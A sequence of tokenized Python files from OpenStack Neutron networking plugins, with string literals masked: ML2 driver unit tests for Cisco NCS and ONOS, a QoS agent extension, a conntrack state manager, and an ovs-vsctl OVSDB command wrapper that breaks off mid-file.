<s> from networking_cisco . plugins . ml2 . drivers . cisco . ncs import driver <EOL> from neutron . tests . unit . plugins . ml2 import test_plugin <EOL> class NCSTestCase ( test_plugin . Ml2PluginV2TestCase ) : <EOL> _mechanism_drivers = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def setUp ( self ) : <EOL> super ( NCSTestCase , self ) . setUp ( ) <EOL> self . port_create_status = '<STR_LIT>' <EOL> driver . NCSMechanismDriver . sendjson = self . check_sendjson <EOL> def check_sendjson ( self , method , urlpath , obj ) : <EOL> self . assertFalse ( urlpath . startswith ( "<STR_LIT>" ) ) <EOL> class NCSMechanismTestBasicGet ( test_plugin . TestMl2BasicGet , NCSTestCase ) : <EOL> pass <EOL> class NCSMechanismTestNetworksV2 ( test_plugin . TestMl2NetworksV2 , NCSTestCase ) : <EOL> pass <EOL> class NCSMechanismTestPortsV2 ( test_plugin . TestMl2PortsV2 , NCSTestCase ) : <EOL> pass </s>
<s> import pbr . version <EOL> __version__ = pbr . version . VersionInfo ( <EOL> '<STR_LIT>' ) . version_string ( ) </s>
<s> import mock <EOL> import requests <EOL> from oslo_config import cfg <EOL> from oslo_serialization import jsonutils <EOL> from oslotest import base <EOL> from neutron . common import constants as n_const <EOL> from neutron . plugins . common import constants <EOL> from neutron . plugins . ml2 import driver_api as api <EOL> from neutron . plugins . ml2 import driver_context as ctx <EOL> import networking_onos . plugins . ml2 . driver as onos_ml2_driver <EOL> fake_network_uuid = '<STR_LIT>' <EOL> fake_network_object = { '<STR_LIT:status>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT:id>' : fake_network_uuid , <EOL> '<STR_LIT>' : None } <EOL> fake_subnet_uuid = '<STR_LIT>' <EOL> fake_subnet_object = { '<STR_LIT>' : None , <EOL> '<STR_LIT>' : [ { '<STR_LIT:start>' : '<STR_LIT>' , <EOL> '<STR_LIT:end>' : '<STR_LIT>' } ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:id>' : fake_subnet_uuid , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : fake_network_uuid , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : False } <EOL> fake_port_uuid = '<STR_LIT>' <EOL> fake_port_object = { '<STR_LIT:status>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT:id>' : fake_port_uuid , <EOL> '<STR_LIT>' : <EOL> [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : fake_network_uuid , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : 
'<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> class ONOSMechanismDriverTestCase ( base . BaseTestCase , <EOL> onos_ml2_driver . ONOSMechanismDriver ) : <EOL> def setUp ( self ) : <EOL> super ( ONOSMechanismDriverTestCase , self ) . setUp ( ) <EOL> self . set_test_config ( ) <EOL> def set_test_config ( self ) : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> cfg . CONF . set_override ( '<STR_LIT:username>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> cfg . CONF . set_override ( '<STR_LIT:password>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . onos_path = cfg . CONF . onos . url_path <EOL> self . onos_auth = ( cfg . CONF . onos . username , <EOL> cfg . CONF . onos . password ) <EOL> def _mock_req_resp ( self , status_code ) : <EOL> response = mock . Mock ( status_code = status_code ) <EOL> response . raise_for_status = mock . Mock ( ) <EOL> return response <EOL> def _test_response ( self , context , oper_type , obj_type , mock_method ) : <EOL> body = None <EOL> if oper_type is not '<STR_LIT>' : <EOL> entity = { obj_type : context . current . copy ( ) } <EOL> body = jsonutils . dumps ( entity , indent = <NUM_LIT:2> ) <EOL> if oper_type == '<STR_LIT>' : <EOL> url = '<STR_LIT>' % ( self . onos_path , obj_type + '<STR_LIT:s>' ) <EOL> else : <EOL> url = '<STR_LIT>' % ( self . onos_path , obj_type + '<STR_LIT:s>' , <EOL> context . current [ '<STR_LIT:id>' ] ) <EOL> kwargs = { '<STR_LIT:url>' : url , '<STR_LIT:data>' : body } <EOL> mock_method . assert_called_once_with ( <EOL> method = oper_type , <EOL> headers = { '<STR_LIT:Content-Type>' : '<STR_LIT:application/json>' } , <EOL> auth = self . onos_auth , ** kwargs ) <EOL> def test_create_network_postcommit ( self ) : <EOL> context = mock . Mock ( current = fake_network_object ) <EOL> resp = self . _mock_req_resp ( requests . codes . created ) <EOL> with mock . patch ( '<STR_LIT>' , <EOL> return_value = resp ) as mock_method : <EOL> self . 
create_network_postcommit ( context ) <EOL> self . _test_response ( context , '<STR_LIT>' , '<STR_LIT>' , mock_method ) <EOL> def test_update_network_postcommit ( self ) : <EOL> context = mock . Mock ( current = fake_network_object ) <EOL> resp = self . _mock_req_resp ( requests . codes . created ) <EOL> with mock . patch ( '<STR_LIT>' , <EOL> return_value = resp ) as mock_method : <EOL> self . update_network_postcommit ( context ) <EOL> self . _test_response ( context , '<STR_LIT>' , '<STR_LIT>' , mock_method ) <EOL> def test_delete_network_postcommit ( self ) : <EOL> context = mock . Mock ( current = { '<STR_LIT:id>' : fake_network_uuid } ) <EOL> resp = self . _mock_req_resp ( requests . codes . created ) <EOL> with mock . patch ( '<STR_LIT>' , <EOL> return_value = resp ) as mock_method : <EOL> self . delete_network_postcommit ( context ) <EOL> self . _test_response ( context , '<STR_LIT>' , '<STR_LIT>' , mock_method ) <EOL> def test_create_subnet_postcommit ( self ) : <EOL> context = mock . Mock ( current = fake_subnet_object ) <EOL> resp = self . _mock_req_resp ( requests . codes . created ) <EOL> with mock . patch ( '<STR_LIT>' , <EOL> return_value = resp ) as mock_method : <EOL> self . create_subnet_postcommit ( context ) <EOL> self . _test_response ( context , '<STR_LIT>' , '<STR_LIT>' , mock_method ) <EOL> def test_update_subnet_postcommit ( self ) : <EOL> context = mock . Mock ( current = fake_subnet_object ) <EOL> resp = self . _mock_req_resp ( requests . codes . created ) <EOL> with mock . patch ( '<STR_LIT>' , <EOL> return_value = resp ) as mock_method : <EOL> self . update_subnet_postcommit ( context ) <EOL> self . _test_response ( context , '<STR_LIT>' , '<STR_LIT>' , mock_method ) <EOL> def test_delete_subnet_postcommit ( self ) : <EOL> context = mock . Mock ( current = { '<STR_LIT:id>' : fake_subnet_uuid } ) <EOL> resp = self . _mock_req_resp ( requests . codes . created ) <EOL> with mock . 
patch ( '<STR_LIT>' , <EOL> return_value = resp ) as mock_method : <EOL> self . delete_subnet_postcommit ( context ) <EOL> self . _test_response ( context , '<STR_LIT>' , '<STR_LIT>' , mock_method ) <EOL> def test_create_port_postcommit ( self ) : <EOL> context = mock . Mock ( current = fake_port_object ) <EOL> resp = self . _mock_req_resp ( requests . codes . created ) <EOL> with mock . patch ( '<STR_LIT>' , <EOL> return_value = resp ) as mock_method : <EOL> self . create_port_postcommit ( context ) <EOL> self . _test_response ( context , '<STR_LIT>' , '<STR_LIT:port>' , mock_method ) <EOL> def test_update_port_postcommit ( self ) : <EOL> context = mock . Mock ( current = fake_port_object ) <EOL> resp = self . _mock_req_resp ( requests . codes . created ) <EOL> with mock . patch ( '<STR_LIT>' , <EOL> return_value = resp ) as mock_method : <EOL> self . update_port_postcommit ( context ) <EOL> self . _test_response ( context , '<STR_LIT>' , '<STR_LIT:port>' , mock_method ) <EOL> def test_delete_port_postcommit ( self ) : <EOL> context = mock . Mock ( current = { '<STR_LIT:id>' : fake_port_uuid } ) <EOL> resp = self . _mock_req_resp ( requests . codes . created ) <EOL> with mock . patch ( '<STR_LIT>' , <EOL> return_value = resp ) as mock_method : <EOL> self . delete_port_postcommit ( context ) <EOL> self . _test_response ( context , '<STR_LIT>' , '<STR_LIT:port>' , mock_method ) <EOL> valid_segment = { <EOL> api . ID : '<STR_LIT>' , <EOL> api . NETWORK_TYPE : constants . TYPE_LOCAL , <EOL> api . SEGMENTATION_ID : '<STR_LIT>' , <EOL> api . PHYSICAL_NETWORK : '<STR_LIT>' } <EOL> invalid_segment = { <EOL> api . ID : '<STR_LIT>' , <EOL> api . NETWORK_TYPE : constants . TYPE_NONE , <EOL> api . SEGMENTATION_ID : '<STR_LIT>' , <EOL> api . PHYSICAL_NETWORK : '<STR_LIT>' } <EOL> def test_check_segment ( self ) : <EOL> """<STR_LIT>""" <EOL> all_network_types = [ constants . TYPE_FLAT , constants . TYPE_GRE , <EOL> constants . TYPE_LOCAL , constants . 
TYPE_VXLAN , <EOL> constants . TYPE_VLAN , constants . TYPE_NONE ] <EOL> valid_types = { network_type <EOL> for network_type in all_network_types <EOL> if self . check_segment ( { api . NETWORK_TYPE : network_type } ) } <EOL> self . assertEqual ( { constants . TYPE_LOCAL , constants . TYPE_GRE , <EOL> constants . TYPE_VXLAN , constants . TYPE_VLAN } , <EOL> valid_types ) <EOL> def test_bind_port ( self ) : <EOL> self . vif_type = "<STR_LIT>" <EOL> self . vif_details = "<STR_LIT>" <EOL> network = mock . MagicMock ( spec = api . NetworkContext ) <EOL> port_context = mock . MagicMock ( <EOL> spec = ctx . PortContext , current = { '<STR_LIT:id>' : '<STR_LIT>' } , <EOL> segments_to_bind = [ self . valid_segment , self . invalid_segment ] , <EOL> network = network ) <EOL> self . bind_port ( port_context ) <EOL> port_context . set_binding . assert_called_once_with ( <EOL> self . valid_segment [ api . ID ] , self . vif_type , <EOL> self . vif_details , status = n_const . PORT_STATUS_ACTIVE ) </s>
<s> import abc <EOL> import collections <EOL> from neutron_lib import exceptions <EOL> from oslo_concurrency import lockutils <EOL> from oslo_log import log as logging <EOL> import six <EOL> from neutron . _i18n import _LW , _LI <EOL> from neutron . agent . l2 import agent_extension <EOL> from neutron . api . rpc . callbacks . consumer import registry <EOL> from neutron . api . rpc . callbacks import events <EOL> from neutron . api . rpc . callbacks import resources <EOL> from neutron . api . rpc . handlers import resources_rpc <EOL> from neutron import manager <EOL> LOG = logging . getLogger ( __name__ ) <EOL> @ six . add_metaclass ( abc . ABCMeta ) <EOL> class QosAgentDriver ( object ) : <EOL> """<STR_LIT>""" <EOL> SUPPORTED_RULES = set ( ) <EOL> @ abc . abstractmethod <EOL> def initialize ( self ) : <EOL> """<STR_LIT>""" <EOL> def create ( self , port , qos_policy ) : <EOL> """<STR_LIT>""" <EOL> self . _handle_update_create_rules ( '<STR_LIT>' , port , qos_policy ) <EOL> def consume_api ( self , agent_api ) : <EOL> """<STR_LIT>""" <EOL> def update ( self , port , qos_policy ) : <EOL> """<STR_LIT>""" <EOL> self . _handle_update_create_rules ( '<STR_LIT>' , port , qos_policy ) <EOL> def delete ( self , port , qos_policy = None ) : <EOL> """<STR_LIT>""" <EOL> if qos_policy is None : <EOL> rule_types = self . SUPPORTED_RULES <EOL> else : <EOL> rule_types = set ( <EOL> [ rule . rule_type <EOL> for rule in self . _iterate_rules ( qos_policy . rules ) ] ) <EOL> for rule_type in rule_types : <EOL> self . _handle_rule_delete ( port , rule_type ) <EOL> def _iterate_rules ( self , rules ) : <EOL> for rule in rules : <EOL> rule_type = rule . rule_type <EOL> if rule_type in self . SUPPORTED_RULES : <EOL> yield rule <EOL> else : <EOL> LOG . warning ( _LW ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : rule . id , '<STR_LIT>' : rule_type } ) <EOL> def _handle_rule_delete ( self , port , rule_type ) : <EOL> handler_name = "<STR_LIT>" . 
join ( ( "<STR_LIT>" , rule_type ) ) <EOL> handler = getattr ( self , handler_name ) <EOL> handler ( port ) <EOL> def _handle_update_create_rules ( self , action , port , qos_policy ) : <EOL> for rule in self . _iterate_rules ( qos_policy . rules ) : <EOL> if rule . should_apply_to_port ( port ) : <EOL> handler_name = "<STR_LIT>" . join ( ( action , "<STR_LIT:_>" , rule . rule_type ) ) <EOL> handler = getattr ( self , handler_name ) <EOL> handler ( port , rule ) <EOL> else : <EOL> LOG . debug ( "<STR_LIT>" , <EOL> { '<STR_LIT:port>' : port , '<STR_LIT>' : rule . id } ) <EOL> class PortPolicyMap ( object ) : <EOL> def __init__ ( self ) : <EOL> self . qos_policy_ports = collections . defaultdict ( dict ) <EOL> self . known_policies = { } <EOL> self . port_policies = { } <EOL> def get_ports ( self , policy ) : <EOL> return self . qos_policy_ports [ policy . id ] . values ( ) <EOL> def get_policy ( self , policy_id ) : <EOL> return self . known_policies . get ( policy_id ) <EOL> def update_policy ( self , policy ) : <EOL> self . known_policies [ policy . id ] = policy <EOL> def has_policy_changed ( self , port , policy_id ) : <EOL> return self . port_policies . get ( port [ '<STR_LIT>' ] ) != policy_id <EOL> def get_port_policy ( self , port ) : <EOL> policy_id = self . port_policies . get ( port [ '<STR_LIT>' ] ) <EOL> if policy_id : <EOL> return self . get_policy ( policy_id ) <EOL> def set_port_policy ( self , port , policy ) : <EOL> """<STR_LIT>""" <EOL> port_id = port [ '<STR_LIT>' ] <EOL> old_policy = self . get_port_policy ( port ) <EOL> self . known_policies [ policy . id ] = policy <EOL> self . port_policies [ port_id ] = policy . id <EOL> self . qos_policy_ports [ policy . id ] [ port_id ] = port <EOL> if old_policy and old_policy . id != policy . id : <EOL> del self . qos_policy_ports [ old_policy . 
id ] [ port_id ] <EOL> return old_policy <EOL> def clean_by_port ( self , port ) : <EOL> """<STR_LIT>""" <EOL> port_id = port [ '<STR_LIT>' ] <EOL> if port_id in self . port_policies : <EOL> del self . port_policies [ port_id ] <EOL> for qos_policy_id , port_dict in self . qos_policy_ports . items ( ) : <EOL> if port_id in port_dict : <EOL> del port_dict [ port_id ] <EOL> if not port_dict : <EOL> self . _clean_policy_info ( qos_policy_id ) <EOL> return <EOL> raise exceptions . PortNotFound ( port_id = port [ '<STR_LIT>' ] ) <EOL> def _clean_policy_info ( self , qos_policy_id ) : <EOL> del self . qos_policy_ports [ qos_policy_id ] <EOL> del self . known_policies [ qos_policy_id ] <EOL> class QosAgentExtension ( agent_extension . AgentCoreResourceExtension ) : <EOL> SUPPORTED_RESOURCES = [ resources . QOS_POLICY ] <EOL> def initialize ( self , connection , driver_type ) : <EOL> """<STR_LIT>""" <EOL> self . resource_rpc = resources_rpc . ResourcesPullRpcApi ( ) <EOL> self . qos_driver = manager . NeutronManager . load_class_for_provider ( <EOL> '<STR_LIT>' , driver_type ) ( ) <EOL> self . qos_driver . consume_api ( self . agent_api ) <EOL> self . qos_driver . initialize ( ) <EOL> self . policy_map = PortPolicyMap ( ) <EOL> registry . subscribe ( self . _handle_notification , resources . QOS_POLICY ) <EOL> self . _register_rpc_consumers ( connection ) <EOL> def consume_api ( self , agent_api ) : <EOL> self . agent_api = agent_api <EOL> def _register_rpc_consumers ( self , connection ) : <EOL> endpoints = [ resources_rpc . ResourcesPushRpcCallback ( ) ] <EOL> for resource_type in self . SUPPORTED_RESOURCES : <EOL> topic = resources_rpc . resource_type_versioned_topic ( resource_type ) <EOL> connection . create_consumer ( topic , endpoints , fanout = True ) <EOL> @ lockutils . synchronized ( '<STR_LIT>' ) <EOL> def _handle_notification ( self , qos_policy , event_type ) : <EOL> if event_type == events . UPDATED : <EOL> self . 
_process_update_policy ( qos_policy ) <EOL> @ lockutils . synchronized ( '<STR_LIT>' ) <EOL> def handle_port ( self , context , port ) : <EOL> """<STR_LIT>""" <EOL> port_id = port [ '<STR_LIT>' ] <EOL> port_qos_policy_id = port . get ( '<STR_LIT>' ) <EOL> network_qos_policy_id = port . get ( '<STR_LIT>' ) <EOL> qos_policy_id = port_qos_policy_id or network_qos_policy_id <EOL> if qos_policy_id is None : <EOL> self . _process_reset_port ( port ) <EOL> return <EOL> if not self . policy_map . has_policy_changed ( port , qos_policy_id ) : <EOL> return <EOL> qos_policy = self . resource_rpc . pull ( <EOL> context , resources . QOS_POLICY , qos_policy_id ) <EOL> if qos_policy is None : <EOL> LOG . info ( _LI ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> { '<STR_LIT>' : qos_policy_id , '<STR_LIT>' : port_id } ) <EOL> self . _process_reset_port ( port ) <EOL> else : <EOL> old_qos_policy = self . policy_map . set_port_policy ( port , qos_policy ) <EOL> if old_qos_policy : <EOL> self . qos_driver . delete ( port , old_qos_policy ) <EOL> self . qos_driver . update ( port , qos_policy ) <EOL> else : <EOL> self . qos_driver . create ( port , qos_policy ) <EOL> def delete_port ( self , context , port ) : <EOL> self . _process_reset_port ( port ) <EOL> def _policy_rules_modified ( self , old_policy , policy ) : <EOL> return not ( len ( old_policy . rules ) == len ( policy . rules ) and <EOL> all ( i in old_policy . rules for i in policy . rules ) ) <EOL> def _process_update_policy ( self , qos_policy ) : <EOL> old_qos_policy = self . policy_map . get_policy ( qos_policy . id ) <EOL> if old_qos_policy : <EOL> if self . _policy_rules_modified ( old_qos_policy , qos_policy ) : <EOL> for port in self . policy_map . get_ports ( qos_policy ) : <EOL> self . qos_driver . delete ( port , old_qos_policy ) <EOL> self . qos_driver . update ( port , qos_policy ) <EOL> self . policy_map . 
update_policy ( qos_policy ) <EOL> def _process_reset_port ( self , port ) : <EOL> try : <EOL> self . policy_map . clean_by_port ( port ) <EOL> self . qos_driver . delete ( port ) <EOL> except exceptions . PortNotFound : <EOL> LOG . info ( _LI ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> port [ '<STR_LIT>' ] ) </s>
<s> import netaddr <EOL> from oslo_log import log as logging <EOL> from neutron . _i18n import _LE <EOL> from neutron . agent . linux import utils as linux_utils <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class IpConntrackManager ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , zone_lookup_func , execute = None , namespace = None ) : <EOL> self . get_device_zone = zone_lookup_func <EOL> self . execute = execute or linux_utils . execute <EOL> self . namespace = namespace <EOL> @ staticmethod <EOL> def _generate_conntrack_cmd_by_rule ( rule , namespace ) : <EOL> ethertype = rule . get ( '<STR_LIT>' ) <EOL> protocol = rule . get ( '<STR_LIT>' ) <EOL> direction = rule . get ( '<STR_LIT>' ) <EOL> cmd = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> if protocol : <EOL> cmd . extend ( [ '<STR_LIT>' , str ( protocol ) ] ) <EOL> cmd . extend ( [ '<STR_LIT>' , str ( ethertype ) . lower ( ) ] ) <EOL> cmd . append ( '<STR_LIT>' if direction == '<STR_LIT>' else '<STR_LIT>' ) <EOL> cmd_ns = [ ] <EOL> if namespace : <EOL> cmd_ns . extend ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , namespace ] ) <EOL> cmd_ns . extend ( cmd ) <EOL> return cmd_ns <EOL> def _get_conntrack_cmds ( self , device_info_list , rule , remote_ip = None ) : <EOL> conntrack_cmds = set ( ) <EOL> cmd = self . _generate_conntrack_cmd_by_rule ( rule , self . namespace ) <EOL> ethertype = rule . get ( '<STR_LIT>' ) <EOL> for device_info in device_info_list : <EOL> zone_id = self . get_device_zone ( device_info [ '<STR_LIT>' ] ) <EOL> ips = device_info . get ( '<STR_LIT>' , [ ] ) <EOL> for ip in ips : <EOL> net = netaddr . IPNetwork ( ip ) <EOL> if str ( net . version ) not in ethertype : <EOL> continue <EOL> ip_cmd = [ str ( net . ip ) , '<STR_LIT>' , zone_id ] <EOL> if remote_ip and str ( <EOL> netaddr . IPNetwork ( remote_ip ) . version ) in ethertype : <EOL> ip_cmd . extend ( [ '<STR_LIT>' , str ( remote_ip ) ] ) <EOL> conntrack_cmds . 
add ( tuple ( cmd + ip_cmd ) ) <EOL> return conntrack_cmds <EOL> def _delete_conntrack_state ( self , device_info_list , rule , remote_ip = None ) : <EOL> conntrack_cmds = self . _get_conntrack_cmds ( device_info_list , <EOL> rule , remote_ip ) <EOL> for cmd in conntrack_cmds : <EOL> try : <EOL> self . execute ( list ( cmd ) , run_as_root = True , <EOL> check_exit_code = True , <EOL> extra_ok_codes = [ <NUM_LIT:1> ] ) <EOL> except RuntimeError : <EOL> LOG . exception ( <EOL> _LE ( "<STR_LIT>" ) , str ( cmd ) ) <EOL> def delete_conntrack_state_by_rule ( self , device_info_list , rule ) : <EOL> self . _delete_conntrack_state ( device_info_list , rule ) <EOL> def delete_conntrack_state_by_remote_ips ( self , device_info_list , <EOL> ethertype , remote_ips ) : <EOL> for direction in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> rule = { '<STR_LIT>' : str ( ethertype ) . lower ( ) , <EOL> '<STR_LIT>' : direction } <EOL> if remote_ips : <EOL> for remote_ip in remote_ips : <EOL> self . _delete_conntrack_state ( <EOL> device_info_list , rule , remote_ip ) <EOL> else : <EOL> self . _delete_conntrack_state ( device_info_list , rule ) </s>
<s> import collections <EOL> import itertools <EOL> from oslo_log import log as logging <EOL> from oslo_serialization import jsonutils <EOL> from oslo_utils import excutils <EOL> import six <EOL> from neutron . _i18n import _LE <EOL> from neutron . agent . common import utils <EOL> from neutron . agent . ovsdb import api as ovsdb <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class Transaction ( ovsdb . Transaction ) : <EOL> def __init__ ( self , context , check_error = False , log_errors = True , opts = None ) : <EOL> self . context = context <EOL> self . check_error = check_error <EOL> self . log_errors = log_errors <EOL> self . opts = [ "<STR_LIT>" % self . context . vsctl_timeout , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> if opts : <EOL> self . opts += opts <EOL> self . commands = [ ] <EOL> def add ( self , command ) : <EOL> self . commands . append ( command ) <EOL> return command <EOL> def commit ( self ) : <EOL> args = [ ] <EOL> for cmd in self . commands : <EOL> cmd . result = None <EOL> args += cmd . vsctl_args ( ) <EOL> res = self . run_vsctl ( args ) <EOL> if res is None : <EOL> return <EOL> res = res . replace ( r'<STR_LIT:\\>' , '<STR_LIT:\\>' ) . splitlines ( ) <EOL> for i , record in enumerate ( res ) : <EOL> self . commands [ i ] . result = record <EOL> return [ cmd . result for cmd in self . commands ] <EOL> def run_vsctl ( self , args ) : <EOL> full_args = [ "<STR_LIT>" ] + self . opts + args <EOL> try : <EOL> return utils . execute ( full_args , run_as_root = True , <EOL> log_fail_as_error = False ) . rstrip ( ) <EOL> except Exception as e : <EOL> with excutils . save_and_reraise_exception ( ) as ctxt : <EOL> if self . log_errors : <EOL> LOG . error ( _LE ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> { '<STR_LIT>' : full_args , '<STR_LIT>' : e } ) <EOL> if not self . check_error : <EOL> ctxt . reraise = False <EOL> class BaseCommand ( ovsdb . Command ) : <EOL> def __init__ ( self , context , cmd , opts = None , args = None ) : <EOL> self . 
context = context <EOL> self . cmd = cmd <EOL> self . opts = [ ] if opts is None else opts <EOL> self . args = [ ] if args is None else args <EOL> def execute ( self , check_error = False , log_errors = True ) : <EOL> with Transaction ( self . context , check_error = check_error , <EOL> log_errors = log_errors ) as txn : <EOL> txn . add ( self ) <EOL> return self . result <EOL> def vsctl_args ( self ) : <EOL> return itertools . chain ( ( '<STR_LIT>' , ) , self . opts , ( self . cmd , ) , self . args ) <EOL> class MultiLineCommand ( BaseCommand ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def result ( self ) : <EOL> return self . _result <EOL> @ result . setter <EOL> def result ( self , raw_result ) : <EOL> self . _result = raw_result . split ( r'<STR_LIT:\n>' ) if raw_result else [ ] <EOL> class DbCommand ( BaseCommand ) : <EOL> def __init__ ( self , context , cmd , opts = None , args = None , columns = None ) : <EOL> if opts is None : <EOL> opts = [ ] <EOL> if columns : <EOL> opts += [ '<STR_LIT>' % "<STR_LIT:U+002C>" . join ( columns ) ] <EOL> super ( DbCommand , self ) . __init__ ( context , cmd , opts , args ) <EOL> @ property <EOL> def result ( self ) : <EOL> return self . _result <EOL> @ result . setter <EOL> def result ( self , raw_result ) : <EOL> if not raw_result : <EOL> self . _result = None <EOL> return <EOL> try : <EOL> json = jsonutils . loads ( raw_result ) <EOL> except ( ValueError , TypeError ) as e : <EOL> with excutils . save_and_reraise_exception ( ) : <EOL> LOG . error ( _LE ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> { '<STR_LIT>' : raw_result , '<STR_LIT>' : e } ) <EOL> headings = json [ '<STR_LIT>' ] <EOL> data = json [ '<STR_LIT:data>' ] <EOL> results = [ ] <EOL> for record in data : <EOL> obj = { } <EOL> for pos , heading in enumerate ( headings ) : <EOL> obj [ heading ] = ovsdb . val_to_py ( record [ pos ] ) <EOL> results . append ( obj ) <EOL> self . _result = results <EOL> class DbGetCommand ( DbCommand ) : <EOL> @ DbCommand . 
result . setter <EOL> def result ( self , val ) : <EOL> DbCommand . result . fset ( self , val ) <EOL> if self . _result : <EOL> self . _result = list ( self . _result [ <NUM_LIT:0> ] . values ( ) ) [ <NUM_LIT:0> ] <EOL> class BrExistsCommand ( DbCommand ) : <EOL> @ DbCommand . result . setter <EOL> def result ( self , val ) : <EOL> self . _result = val is not None <EOL> def execute ( self ) : <EOL> return super ( BrExistsCommand , self ) . execute ( check_error = False , <EOL> log_errors = False ) <EOL> class OvsdbVsctl ( ovsdb . API ) : <EOL> def transaction ( self , check_error = False , log_errors = True , ** kwargs ) : <EOL> return Transaction ( self . context , check_error , log_errors , ** kwargs ) <EOL> def add_br ( self , name , may_exist = True , datapath_type = None ) : <EOL> opts = [ '<STR_LIT>' ] if may_exist else None <EOL> params = [ name ] <EOL> if datapath_type : <EOL> params += [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , name , <EOL> '<STR_LIT>' % datapath_type ] <EOL> return BaseCommand ( self . context , '<STR_LIT>' , opts , params ) <EOL> def del_br ( self , name , if_exists = True ) : <EOL> opts = [ '<STR_LIT>' ] if if_exists else None <EOL> return BaseCommand ( self . context , '<STR_LIT>' , opts , [ name ] ) <EOL> def br_exists ( self , name ) : <EOL> return BrExistsCommand ( self . context , '<STR_LIT:list>' , args = [ '<STR_LIT>' , name ] ) <EOL> def port_to_br ( self , name ) : <EOL> return BaseCommand ( self . context , '<STR_LIT>' , args = [ name ] ) <EOL> def iface_to_br ( self , name ) : <EOL> return BaseCommand ( self . context , '<STR_LIT>' , args = [ name ] ) <EOL> def list_br ( self ) : <EOL> return MultiLineCommand ( self . context , '<STR_LIT>' ) <EOL> def br_get_external_id ( self , name , field ) : <EOL> return BaseCommand ( self . context , '<STR_LIT>' , <EOL> args = [ name , field ] ) <EOL> def db_create ( self , table , ** col_values ) : <EOL> args = [ table ] <EOL> args += _set_colval_args ( * col_values . 
items ( ) ) <EOL> return BaseCommand ( self . context , '<STR_LIT>' , args = args ) <EOL> def db_destroy ( self , table , record ) : <EOL> args = [ table , record ] <EOL> return BaseCommand ( self . context , '<STR_LIT>' , args = args ) <EOL> def db_set ( self , table , record , * col_values ) : <EOL> args = [ table , record ] <EOL> args += _set_colval_args ( * col_values ) <EOL> return BaseCommand ( self . context , '<STR_LIT>' , args = args ) <EOL> def db_clear ( self , table , record , column ) : <EOL> return BaseCommand ( self . context , '<STR_LIT>' , args = [ table , record , <EOL> column ] ) <EOL> def db_get ( self , table , record , column ) : <EOL> return DbGetCommand ( self . context , '<STR_LIT:list>' , args = [ table , record ] , <EOL> columns = [ column ] ) <EOL> def db_list ( self , table , records = None , columns = None , if_exists = False ) : <EOL> opts = [ '<STR_LIT>' ] if if_exists else None <EOL> args = [ table ] <EOL> if records : <EOL> args += records <EOL> return DbCommand ( self . context , '<STR_LIT:list>' , opts = opts , args = args , <EOL> columns = columns ) <EOL> def db_find ( self , table , * conditions , ** kwargs ) : <EOL> columns = kwargs . pop ( '<STR_LIT>' , None ) <EOL> args = itertools . chain ( [ table ] , <EOL> * [ _set_colval_args ( c ) for c in conditions ] ) <EOL> return DbCommand ( self . context , '<STR_LIT>' , args = args , columns = columns ) <EOL> def set_controller ( self , bridge , controllers ) : <EOL> return BaseCommand ( self . context , '<STR_LIT>' , <EOL> args = [ bridge ] + list ( controllers ) ) <EOL> def del_controller ( self , bridge ) : <EOL> return BaseCommand ( self . context , '<STR_LIT>' , args = [ bridge ] ) <EOL> def get_controller ( self , bridge ) : <EOL> return MultiLineCommand ( self . context , '<STR_LIT>' , args = [ bridge ] ) <EOL> def set_fail_mode ( self , bridge , mode ) : <EOL> return BaseCommand ( self . 
